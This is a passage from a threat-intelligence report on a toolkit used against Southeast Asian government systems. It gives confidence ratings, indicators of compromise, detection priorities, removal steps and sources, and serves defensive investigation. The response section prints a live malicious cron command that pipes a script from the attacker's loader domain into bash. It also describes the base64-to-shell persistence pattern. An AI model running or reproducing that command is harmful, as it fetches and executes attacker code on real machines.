MODERATE GSocket kit on svr1.nast.ph is a separate second intruder Predates tenancy by ~9 months, absent from the toolkit, different playbook, operator’s own writes bounced (Section 7)
LOW Operator origin signal of UTC+7 / mainland Southeast Asia Timezone stamps only; no nationality, jurisdiction, or sponsorship claim is supportable (10.4)
INSUFFICIENT Named-actor attribution, nationality, and sponsorship Zero infrastructure, tool, TTP, or source overlap; no operator identity artifact recovered (10.1)
INSUFFICIENT Ownership of the residual 43.208.251.115:1080 SOCKS5 endpoint Operator could not connect to it, and it has zero passive footprint (10.4)

Two things about how to read that table.

HIGH means a captured artifact proves the outcome. It does not mean the toolkit did everything it was built to do. Credential possession across four governments is real and broad, while proven use stops at the HIGH and MODERATE-HIGH rows above.

The two INSUFFICIENT rows are deliberate, not gaps somebody forgot to fill. Naming the actor and resolving that residual endpoint would each need evidence the capture simply does not contain, and stretching either one would cost the rest of the assessment its credibility.


13. Indicators of Compromise

The complete indicator set ships as a separate JSON feed, undefanged so it drops straight into a SIEM or EDR: seasia-gov-exploitation-toolkit-144-172-106-236-iocs.json. Every indicator carries its own confidence, an action of BLOCK, MONITOR or HUNT, and a second_actor flag so you never mix the two actor sets. Take them from there rather than retyping anything out of the defanged prose below.

Full indicator breakdown: what is in the feed, and the hard-exclusion list of what is deliberately left out

The feed carries the following.

  • File hashes: four samples (SHA-256, SHA-1, MD5 for each): the commodity chisel.exe (HUNT-only, shared by 179 submitters, never a block or attribution anchor), the operator’s tunnel-server and tunnel-agent Go binaries (HUNT), and the second actor’s cat.sh GSocket loader (8a7d3876…dc4d69, BLOCK).
  • Network: the operator VPS 144.172.106[.]236 (MONITOR, single dedicated box); the second-actor loader domain localroot[.]sbs (BLOCK, Cloudflare-fronted, 0/91 on VirusTotal so no vendor will catch it); the second-actor embedded IP 87.106.101[.]131 (HUNT); the operator’s provider-assigned hostname utah01-maas.cloudzy[.]com (context only); and the spoofed phishing sender security-monitor@tni[.]mil[.]id (MONITOR).
  • Durable operator anchors: two chisel server-key fingerprints, three SSH host-key fingerprints, one SSH authorized-key fingerprint, and the two content strings (Zimbra Security Monitor v3.1 -- System Diagnostics and tunnel-proxy/pkg/mux). These are the attribution-grade indicators, and the Zimbra banner is the one to hunt on first.
  • Host artifacts: the seven Zimbra shell.jsp drop paths, the operator’s /tmp staging paths, the four second-actor /home/nast/* implant paths, and the two second-actor cron patterns (including the durable base64-indirection behavioral anchor).
  • CVEs referenced in operator code: the nine identifiers with per-CVE notes, including the flagged Tableau labelling discrepancy and the exclusion of the fabricated CVE-2026-68645.

Some things are deliberately excluded, and the exclusions matter as much as the contents. The feed carries an explicit hard-exclusion list so downstream consumers do not re-add poison indicators. It excludes the public VPNJantit exit node, the shared Hysteria2 proxy, and serveo.net (hops the operator connected through, not operator assets, blocking them would hit unrelated legitimate users); the VPNJantit certificate; the windows-Utah-* provider VM-template certificate names (a dead 2,634-host attribution signal); the unrelated Moroccan spam co-tenant bootyreader[.]com; internet-scanner source IPs from the operator’s logs; BSSN’s own e-signature CA hosts (present only as stolen-PDF signature metadata); the Kejaksaan stolen-PDF hashes (victim data, not blockable indicators); and the GSocket relay/webhook domains, which are shared public infrastructure marked hunt-only, never-block. Treating any of these as an operator or block indicator would misattribute or cause collateral damage.


14. Detection and Hunting Guidance

The full detection package (YARA, Sigma, and Suricata rules, each compile-validated and tier-labelled) is a separate deliverable: Detection Rules: SE-Asia Government Exploitation Toolkit. It provides 6 YARA rules, 8 Detection-tier plus 6 Hunting-tier Sigma rules, and 5 Detection plus 2 Hunting Suricata signatures, with every rule labelled by which of the two actors it belongs to. This section frames how to use them; it does not restate the rules.

Detection priorities, in order.

  1. Start with the Zimbra web-shell signature. The operator-authored banner Zimbra Security Monitor v3.1 -- System Diagnostics and the seven shell.jsp drop paths target a persistence mechanism rather than a transient session, so they remain useful long after the operator’s C2 goes dark, and the banner has zero legitimate use, which makes it as high-fidelity as operator content gets.
  2. Then the second-actor GSocket loader. Block localroot[.]sbs and the cat.sh hash trio, and hunt the durable behavioral anchor (base64-decode piped to a shell with both output streams suppressed, launched via curl <url> | bash from cron) plus executables in a user home directory bearing system-daemon names. The behavioral pattern outlives any specific domain or path.
  3. Then the durable operator anchors, ahead of the live C2. The chisel server-key fingerprints and the SSH host-key and authorized-key fingerprints recognize this operator across an IP change; hunt them in preference to chasing the near-idle live infrastructure.

The coverage gaps are worth understanding rather than working around. The detection file says plainly that most of these rules are unlikely to fire on live traffic, because the C2 estate produced one callback in fourteen days. Chasing that with more network rules is the wrong instinct; credential resets and web-shell hunting are where the return is.

Several techniques were deliberately left without rules, and the reasons hold up:

  • Valid-account use (T1078), the operator’s dominant access method, cannot be distinguished from legitimate logins by any general-purpose signature without the specific compromised usernames as an organization-specific watchlist. That is an account-level control the affected organizations must apply, not something a third-party rule can carry.
  • Session-cookie theft and repository browsing (T1539, T1213): the Kejaksaan document theft rides an already-established authenticated session and produces no distinguishing artifact beyond normal traffic to the victim’s own hostnames; a rule keyed to those hostnames would have zero value outside that one organization.
  • Commodity and shared indicators: the chisel file hash (shared by 179 submitters), the windows-Utah-* certificate convention, the VPNJantit/Hysteria2/serveo hops, and the Telegram/Discord/GitHub/webhook.site domains were all assessed and cut from rule authoring because a signature on any of them would misattribute or fire on essentially all networks. They live in the IOC feed as hunt context only.

One YARA false positive is worth flagging so it never misleads a hunt. chisel.exe and both Go tunnel binaries trip the family rules PoetRat_Python and android_meterpreter, but those are generic crypto and base64 byte-pattern overlaps on unrelated Go binaries, not a real family match, and no operator script matched any malware-family rule. Treat those hits as noise; they carry no weight in the attribution or detection judgements here.

A caveat travels with every second-actor rule. The GSocket kit’s separate-intruder assessment is MODERATE, not DEFINITE. If future evidence links the two actors, those rules should be re-labelled under the operator’s own set.


15. Response Orientation

This is a brief orientation to what to address, not a procedure for how. Organizations with an active incident should engage their own incident-response team or national CERT; the four national CERTs (Indonesia, Thailand, Malaysia, the Philippines) were notified before publication. Section 14 sets the detection priority order, with the Zimbra web-shell signature first, then the second-actor GSocket loader, then the durable operator anchors ahead of the near-idle live C2. What follows here is what to remove and contain.

Persistence targets to find and remove.

  • The five malicious cron entries on svr1.nast.ph, including curl https://localroot.sbs/cat.sh | bash.
  • The four daemon-masquerade implants /home/nast/netd, /home/nast/authd, /home/nast/bootcfg, /home/nast/udevd-sync.
  • Any authorized_keys entry matching the operator injection pubkey SHA256:b2sH9INF…BGCE.
  • Any shell.jsp under /opt/zimbra/**/webapps/zimbra/.

Containment categories.

  • Notify and reset credentials for confirmed and credential-possessed government systems (via the national CERTs).
  • Rotate every account the operator is confirmed or assessed to hold, across all four countries.
  • Eradicate the host-level GSocket implants on the Philippine server.
  • Block the second-actor loader domain and hashes at the perimeter.
  • Patch the exposed edge products (Ivanti, Zimbra, Exchange, Moodle) and audit Tableau for the SSRF and SAML techniques.

16. References and Sources

Threat-intelligence context in Section 9 draws on the following public sources; full tiered sourcing is retained in the investigation record.

  • CISA, AA24-060B: Ivanti Connect Secure/Policy Secure exploitation (Tier 1). cisa.gov
  • CISA, AA21-062A: Microsoft Exchange / ProxyLogon mass exploitation (Tier 1). cisa.gov
  • Censys, “The Mass Exploitation of Ivanti Connect Secure” (Tier 3). censys.com
  • Securelist / Kaspersky, “Ongoing exploitation of CVE-2022-41352 (Zimbra 0-day)” (Tier 2). securelist.com
  • Rapid7 Vulnerability & Exploit Database: Zimbra CVE-2022-41352, Moodle CVE-2020-25627/-25629/-25630 entries (Tier 3). rapid7.com
  • Jenkins Security Advisory 2024-03-06: CVE-2024-28149 (Jenkins HTML Publisher Plugin, not Tableau) (Tier 1). jenkins.io
  • GitHub Advisory Database, GHSA-4hxw-gc2q-f6f3: CVE-2024-51758 (Filament PHP framework, not Tableau) (Tier 1). github.com
  • Seiso Security, “Exploiting Tableau Site-Specific SAML”: CVE-2020-6939, closest genuine match for the SAML technique (Tier 3). seisollc.com
  • frycos, “Tableau Server - There Ain’t No Vulns”: closest match for the SSRF-to-metadata technique (Tier 3). frycos.github.io
  • Halcyon, “Cloudzy with a Chance of Ransomware” (Tier 3); CyberScoop corroboration: AS14956/Cloudzy reputational context.
  • Red Canary Threat Detection Report, “VPN Abuse” (Tier 3): free-VPN anonymization abuse pattern.
  • Hysteria 2 official protocol documentation (Tier 1); MITRE ATT&CK T1572: Protocol Tunneling reference.
  • hackerschoice/gsocket official README (Tier 1); SANS Internet Storm Center GSocket bash-script backdoor diary (Tier 2/3); Sansec GSocket / defunct.dat research (Tier 3); Elastic Security Labs, “Betting on Bots” / REF6138 (Tier 2): GSocket second-actor context.
  • MITRE ATT&CK group profiles G0121 (SideWinder) and G0129 (Mustang Panda); ITSEC Asia / CybersecAsia and intellibron.io RagaSerpent reporting (Tier 3): named-comparator exclusion.
  • Hunt.io (with researcher Bob Diachenko), “Thailand’s Ministry of Finance Targeted With Hermes AI Agent Running Unattended, Hades Implant Staged” (Tier 3), hunt.io, 2026-07-23: independent, unconnected Thai government targeting noted in Section 9.4.

© 2026 Joseph, The Hunters Ledger. Licensed under CC BY 4.0, free to republish and adapt, including commercially, with attribution to The Hunters Ledger and a link to the original.

Support Independent Threat Research

If this report was useful, consider supporting the work that goes into it.

High Priority IOCs
  • 144.172.106[.]236 Operator VPS, open-directory origin
  • localroot[.]sbs Second-actor loader domain (block/alert)
  • 8a7d387663d7f32730ed8b996f1dab7c2eed4b829b71fd48c608f51569dc4d69 cat.sh, second-actor GSocket loader (SHA256)
  • 23560e13d06d8153e0e7566d153ffe9eec79e08eb1ed18f8cd1417728e7dbdd6 Bespoke Go tunnel-server (SHA256)
STIX 2.1 Bundle

Machine-readable threat intel for this report, ready to import into OpenCTI, MISP, or any STIX-aware platform.